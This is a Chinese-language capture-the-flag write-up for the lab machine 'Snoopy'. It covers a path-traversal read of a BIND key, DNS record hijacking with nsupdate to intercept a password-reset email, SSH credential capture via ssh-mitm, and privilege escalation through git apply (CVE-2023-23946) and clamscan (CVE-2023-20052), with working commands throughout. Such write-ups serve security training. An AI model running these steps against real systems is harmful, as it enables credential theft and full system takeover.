snoopy
Machine:Linux
Level:hard
信息收集
nmap
└─# nmap -T4 -p- -sV -sC -A 10.10.11.212
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 03:50 GMT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.51% done
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 12.74% done; ETC: 03:51 (0:00:34 remaining)
Stats: 0:02:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 39.20% done; ETC: 03:56 (0:03:26 remaining)
Nmap scan report for 10.10.11.212
Host is up (0.19s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 ee:6b:ce:c5:b6:e3:fa:1b:97:c0:3d:5f:e3:f1:a1:6e (ECDSA)
|_ 256 54:59:41:e1:71:9a:1a:87:9c:1e:99:50:59:bf:e5:ba (ED25519)
53/tcp open domain ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.18.12-0ubuntu0.22.04.1-Ubuntu
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: SnoopySec Bootstrap Template - Index
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=8/1%OT=22%CT=1%CU=40593%PV=Y%DS=2%DC=T%G=Y%TM=64C8830B
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11
OS:NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 207.18 ms 10.10.14.1
2 207.28 ms 10.10.11.212
手工验证信息
80
home
首页中的两个here下载下来的文件不同,查看两个请求的链接分别是/download和/download?file=announcement.pdf,尝试更改file参数看看能不能读取/etc/passwd,尝试后发现可以通过双写绕过来获取文件。在上面的nmap我们发现了有Bind,读取一下发现DNS的账密。
└─# cat /home/kali/Desktop/named.conf
// This is the primary configuration file for the BIND DNS server named.
//
// Please read /usr/share/doc/bind9/README.Debian.gz for information on the
// structure of BIND configuration files in Debian, *BEFORE* you customize
// this configuration file.
//
// If you are just adding zones, please do that in /etc/bind/named.conf.local
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
key "rndc-key" {
algorithm hmac-sha256;
secret "[delete]";
};
Team
页面包含公司人员和邮箱。
contact
界面提示Attention: As we migrate DNS records to our new domain please be advised that our mailserver 'mail.snoopy.htb' is currently offline.,访问网站无响应并且也不会跳转,我们通过执行区域传输来枚举DNS看看有没有别的子域名。
└─# dig axfr snoopy.htb @10.10.11.212
; <<>> DiG 9.18.16-1-Debian <<>> axfr snoopy.htb @10.10.11.212
;; global options: +cmd
snoopy.htb. 86400 IN SOA ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
snoopy.htb. 86400 IN NS ns1.snoopy.htb.
snoopy.htb. 86400 IN NS ns2.snoopy.htb.
mattermost.snoopy.htb. 86400 IN A 172.18.0.3
mm.snoopy.htb. 86400 IN A 127.0.0.1
ns1.snoopy.htb. 86400 IN A 10.0.50.10
ns2.snoopy.htb. 86400 IN A 10.0.51.10
postgres.snoopy.htb. 86400 IN A 172.18.0.2
provisions.snoopy.htb. 86400 IN A 172.18.0.4
www.snoopy.htb. 86400 IN A 127.0.0.1
snoopy.htb. 86400 IN SOA ns1.snoopy.htb. ns2.snoopy.htb. 2022032612 3600 1800 604800 86400
;; Query time: 252 msec
;; SERVER: 10.10.11.212#53(10.10.11.212) (TCP)
;; WHEN: Wed Aug 23 07:02:39 GMT 2023
;; XFR size: 11 records (messages 1, bytes 325)
漏洞利用
经过测试只有mm.snoopy.htb能访问,其他的均无法访问。mm.snoopy.htb中是mattermost论坛,使用Team中的账号弱口令失败,重置密码显示无法发送密码但随便别的邮箱可以(mail.snoopy.htb真不能用🤣)。我们需要登录DNS添加解析并劫持验证码。
└─# nsupdate -k key
> server 10.10.11.212
> update add mail.snoopy.htb 86400 A 10.10.14.51
> send
起一个smtpd服务接收重置邮箱密码的token,但需要注意token中的3D和=需要删除否则无法重置成功。
└─# python3 -m smtpd -n -c DebuggingServer 10.10.14.51:25
....
b'Reset Password ( http://mm.snoopy.htb/reset_password_complete?token=3D8s1k9='
b'wqi9tcgf6jdsecinmagaw7tpzfefqhdjbn8qns7reoxr9g9h7h4dbgijffe )'
b''
b'The password reset link expires in 24 hours.'
登录后是个聊天的网站,/devsecops/integrations网页显示有斜杠命令,返回聊天框查看有哪些命令,其中/server_provision是我们填写自己的IP后它回来连接我们但这并不是shell,这个连接会马上断开。使用SSH-mitm拦截SSH流量获取密钥。
...
INFO Remote authentication succeeded
Remote Address: 10.10.11.212:22
Username: cbrown
Password: [delete]
Agent: no agent
INFO ℹ 007d3052-8acb-4556-803c-c96cd456a9a5 - local port forwading
SOCKS port: 43885
SOCKS4:
* socat: socat TCP-LISTEN:LISTEN_PORT,fork
socks4:127.0.0.1:DESTINATION_ADDR:DESTINATION_PORT,socksport=43885
* netcat: nc -X 4 -x localhost:43885 address port
SOCKS5:
* netcat: nc -X 5 -x localhost:43885 address port
INFO got ssh command: ls -la
INFO ℹ 007d3052-8acb-4556-803c-c96cd456a9a5 - session started
INFO got remote command: ls -la
INFO remote command 'ls -la' exited with code: 0
权限提升
水平越权
登录ssh查看我们的 sudo 权限。
cbrown@snoopy:$ sudo -l
Matching Defaults entries for cbrown on snoopy:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH
XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass
User cbrown may run the following commands on snoopy:
(sbrown) PASSWD: /usr/bin/git ^apply -v [a-zA-Z0-9.]+$
其存在CVE-2023-23946,我们创建一个版本库,在其中创建一个文件并添加id_rsa.pub,创建一个指向用户sbrown的.ssh文件夹的符号链接,赋予 $HOME 所有权限,然后以用户sbrown的身份运行命令。1
cbrown@snoopy:~$ mkdir repo
cbrown@snoopy:~$ cd !$
cd repo
cbrown@snoopy:~/repo$ git init
cbrown@snoopy:~/repo$ echo "diff --git a/symlink b/renamed-symlink
similarity index 100%
rename from symlink
rename to renamed-symlink
--
diff --git /dev/null b/renamed-symlink/create-me
new file mode 100644
index 0000000..039727e
--- /dev/null
+++ b/renamed-symlink/authorized_keys
@@ -0,0 +1 @@
+ ssh-rsa id_rsa.pub" > patch
cbrown@snoopy:~/repo$ ln -s /home/sbrown/.ssh symlink
cbrown@snoopy:~/repo$ chmod 777 /home/cbrown
cbrown@snoopy:~/repo$ chmod 777 /home/cbrown/repo
cbrown@snoopy:~/repo$ sudo -u sbrown /usr/bin/git apply -v patch
垂直提权
sbrown@snoopy:~$ sudo -l
Matching Defaults entries for sbrown on snoopy:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH
XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass
User sbrown may run the following commands on snoopy:
(root) NOPASSWD: /usr/local/bin/clamscan ^--debug /home/sbrown/scanfiles/[a-zA-Z0-9.]+$
搜索发现clamscan --debug在前一段时间存在漏洞CVE-2023-20052,按照文档里的操作在自己的机器上运行的得到exploit.dmg,将物件上传至/home/sbrown/scanfiles并运行sudo便可。
sbrown@snoopy:~/scanfiles$ sudo /usr/local/bin/clamscan --debug /home/sbrown/scanfiles/exploit.dmg
...
LibClamAV debug: cli_magic_scan: returning 0 at line 4997
LibClamAV debug: clean_cache_add: 38f1961fa104fbc6f9423cb26f8bd97c (level 0)
LibClamAV debug: cli_scandmg: wanted blkx, text value is [delete]
...
当然除了直接获取root.txt,也可以获取/root/.ssh/id_rsa来连接靶机。